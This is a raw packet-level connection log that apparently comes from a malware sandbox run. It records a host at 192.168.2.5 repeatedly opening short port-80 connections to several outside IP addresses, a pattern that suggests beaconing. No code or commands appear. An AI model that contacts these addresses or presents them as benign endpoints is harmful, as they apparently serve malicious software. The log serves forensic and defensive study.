                                                                                                                                                                            Dec 11, 2024 09:40:40.931819916 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.931843042 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.932094097 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.935570955 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.935719013 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.938281059 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.938528061 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.938559055 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.941247940 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.941401958 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.942850113 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.943845034 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.943865061 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.946728945 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.946866989 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.946909904 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.946909904 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.949207067 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.949393988 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.949522972 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.951948881 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.952203035 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.952331066 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.954533100 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.954895973 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.954907894 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.956568956 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.956585884 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.956891060 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.959378958 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.959397078 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.959745884 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.961421967 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.961719990 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:40.961749077 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.961891890 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:40.965152025 CET5000780192.168.2.55.39.10.93
                                                                                                                                                                            Dec 11, 2024 09:40:41.084599972 CET80500075.39.10.93192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:46.456084013 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:46.575521946 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:46.575706959 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:46.592794895 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:46.712251902 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:47.905786037 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:47.905930042 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:47.905945063 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:47.905989885 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:47.906027079 CET8050029194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:47.906161070 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:48.097426891 CET5002980192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:49.121567011 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:49.240962982 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:49.241053104 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:49.256979942 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:49.625854015 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569122076 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569137096 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569148064 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569159985 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569170952 CET8050035194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:50.569209099 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:50.569298029 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:50.759159088 CET5003580192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:51.772133112 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:51.891587973 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:51.891819954 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:51.905644894 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:52.025235891 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:52.025254011 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.220352888 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.220398903 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.220412016 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.220446110 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:53.220576048 CET8050041194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:53.220638037 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:53.410634041 CET5004180192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:54.424736023 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:54.544341087 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:54.544495106 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:54.553649902 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:54.673006058 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.871958017 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872020960 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872034073 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872136116 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.872271061 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872328997 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872345924 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872358084 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872365952 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.872400999 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.872597933 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872608900 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872654915 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.872669935 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:40:55.872715950 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.877186060 CET5004780192.168.2.5194.58.112.174
                                                                                                                                                                            Dec 11, 2024 09:40:55.996856928 CET8050047194.58.112.174192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:01.445473909 CET5006980192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:01.564755917 CET8050069209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:01.564862967 CET5006980192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:01.580017090 CET5006980192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:01.699419022 CET8050069209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:02.787748098 CET8050069209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:02.787873030 CET8050069209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:02.790862083 CET5006980192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:03.178128004 CET5006980192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:04.197751045 CET5007580192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:04.317049980 CET8050075209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:04.318919897 CET5007580192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:04.332432985 CET5007580192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:04.451646090 CET8050075209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:05.540657043 CET8050075209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:05.540734053 CET8050075209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:05.540812969 CET5007580192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:06.094651937 CET5007580192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:07.103200912 CET5008180192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:07.222614050 CET8050081209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:07.222732067 CET5008180192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:07.254709959 CET5008180192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:07.374032021 CET8050081209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:07.374103069 CET8050081209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:08.513253927 CET8050081209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:08.513340950 CET8050081209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:08.517050982 CET5008180192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:08.784863949 CET5008180192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:09.789851904 CET5008780192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:09.909533024 CET8050087209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:09.909634113 CET5008780192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:09.919754028 CET5008780192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:10.039125919 CET8050087209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:11.128878117 CET8050087209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:11.128931999 CET8050087209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:11.129092932 CET5008780192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:11.139874935 CET5008780192.168.2.5209.74.64.187
                                                                                                                                                                            Dec 11, 2024 09:41:11.259196997 CET8050087209.74.64.187192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:16.866871119 CET5010380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:16.986202955 CET80501033.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:16.990003109 CET5010380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:17.003994942 CET5010380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:17.124563932 CET80501033.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:18.519515038 CET5010380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:18.639228106 CET80501033.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:18.639332056 CET5010380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:19.539043903 CET5010480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:19.660041094 CET80501043.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:19.660166979 CET5010480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:19.676856995 CET5010480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:19.797858000 CET80501043.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:20.760881901 CET80501043.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:20.760899067 CET80501043.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:20.761014938 CET5010480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:21.190794945 CET5010480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:22.209089994 CET5010580192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:22.328520060 CET80501053.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:22.329030991 CET5010580192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:22.343019009 CET5010580192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:22.462415934 CET80501053.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:22.462512970 CET80501053.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:23.425856113 CET80501053.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:23.433614969 CET80501053.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:23.433676958 CET5010580192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:23.851813078 CET5010580192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:24.870851040 CET5010680192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:24.990266085 CET80501063.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:24.990441084 CET5010680192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:25.002953053 CET5010680192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:25.122632027 CET80501063.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:26.093805075 CET80501063.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:26.093874931 CET80501063.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:26.093992949 CET5010680192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:26.098854065 CET5010680192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:26.218872070 CET80501063.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:28.051795006 CET49831443192.168.2.5151.101.130.137
                                                                                                                                                                            Dec 11, 2024 09:41:28.051836967 CET49831443192.168.2.5151.101.130.137
                                                                                                                                                                            Dec 11, 2024 09:41:31.631509066 CET5010780192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:31.750875950 CET80501073.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:31.751005888 CET5010780192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:31.768153906 CET5010780192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:31.903830051 CET80501073.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:32.878454924 CET80501073.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:32.878524065 CET80501073.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:32.878997087 CET5010780192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:33.269582033 CET5010780192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:34.288153887 CET5010880192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:34.407525063 CET80501083.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:34.407661915 CET5010880192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:34.422874928 CET5010880192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:34.542262077 CET80501083.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:35.520178080 CET80501083.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:35.520265102 CET80501083.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:35.520319939 CET5010880192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:35.935566902 CET5010880192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:36.944291115 CET5010980192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:37.063718081 CET80501093.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:37.063827038 CET5010980192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:37.081202030 CET5010980192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:37.200597048 CET80501093.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:37.200684071 CET80501093.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:37.586042881 CET49878443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:41:37.586080074 CET49878443192.168.2.5151.101.1.108
                                                                                                                                                                            Dec 11, 2024 09:41:37.586438894 CET49848443192.168.2.518.165.220.110
                                                                                                                                                                            Dec 11, 2024 09:41:37.586482048 CET49848443192.168.2.518.165.220.110
                                                                                                                                                                            Dec 11, 2024 09:41:38.158431053 CET80501093.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:38.165227890 CET80501093.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:38.169001102 CET5010980192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:38.582117081 CET5010980192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:39.597162962 CET5011080192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:39.716626883 CET80501103.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:39.716713905 CET5011080192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:39.727699041 CET5011080192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:39.847001076 CET80501103.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:40.814867020 CET80501103.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:40.814986944 CET80501103.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:40.819111109 CET5011080192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:40.822896004 CET5011080192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:40.942339897 CET80501103.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:46.331408024 CET5011180192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:46.450908899 CET80501113.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:46.453135967 CET5011180192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:46.470304012 CET5011180192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:46.589654922 CET80501113.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:47.548088074 CET80501113.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:47.548203945 CET80501113.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:47.548275948 CET5011180192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:47.975502968 CET5011180192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:48.990870953 CET5011280192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:49.110191107 CET80501123.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:49.110369921 CET5011280192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:49.125499010 CET5011280192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:49.244812965 CET80501123.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:50.205652952 CET80501123.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:50.205719948 CET80501123.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:50.205826044 CET5011280192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:50.628176928 CET5011280192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:51.634213924 CET5011380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:51.753550053 CET80501133.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:51.753667116 CET5011380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:51.768727064 CET5011380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:51.888220072 CET80501133.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:51.888251066 CET80501133.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:52.848506927 CET80501133.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:52.854835033 CET80501133.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:52.854926109 CET5011380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:53.283035994 CET5011380192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:54.288209915 CET5011480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:54.411024094 CET80501143.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:54.411470890 CET5011480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:54.423382998 CET5011480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:54.542953014 CET80501143.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:55.509397030 CET80501143.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:55.509443045 CET80501143.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:41:55.509551048 CET5011480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:55.513931990 CET5011480192.168.2.53.33.130.190
                                                                                                                                                                            Dec 11, 2024 09:41:55.633322954 CET80501143.33.130.190192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:01.481132984 CET5011580192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:01.601763010 CET805011547.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:01.601864100 CET5011580192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:01.650675058 CET5011580192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:01.770056963 CET805011547.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:03.153641939 CET5011580192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:03.318378925 CET805011547.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:04.163619041 CET5011680192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:04.284070015 CET805011647.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:04.284163952 CET5011680192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:04.298125982 CET5011680192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:04.417565107 CET805011647.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:05.801683903 CET5011680192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:05.961400032 CET805011647.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:06.819207907 CET5011780192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:06.938826084 CET805011747.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:06.941128969 CET5011780192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:06.955275059 CET5011780192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:07.074796915 CET805011747.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:07.074812889 CET805011747.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:08.461441040 CET5011780192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:08.625400066 CET805011747.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:09.480182886 CET5011880192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:09.599709034 CET805011847.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:09.599828005 CET5011880192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:09.609015942 CET5011880192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:09.728455067 CET805011847.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:23.529798985 CET805011547.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:23.529858112 CET5011580192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:26.186424971 CET805011647.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:26.191085100 CET5011680192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:28.842497110 CET805011747.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:28.843300104 CET5011780192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:31.499033928 CET805011847.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:31.499161959 CET5011880192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:31.500263929 CET5011880192.168.2.547.238.157.253
                                                                                                                                                                            Dec 11, 2024 09:42:31.623332977 CET805011847.238.157.253192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:37.073108912 CET5011980192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:37.192676067 CET805011967.223.117.169192.168.2.5
                                                                                                                                                                            Dec 11, 2024 09:42:37.192802906 CET5011980192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:37.207106113 CET5011980192.168.2.567.223.117.169
                                                                                                                                                                            Dec 11, 2024 09:42:37.326978922 CET805011967.223.117.169192.168.2.5
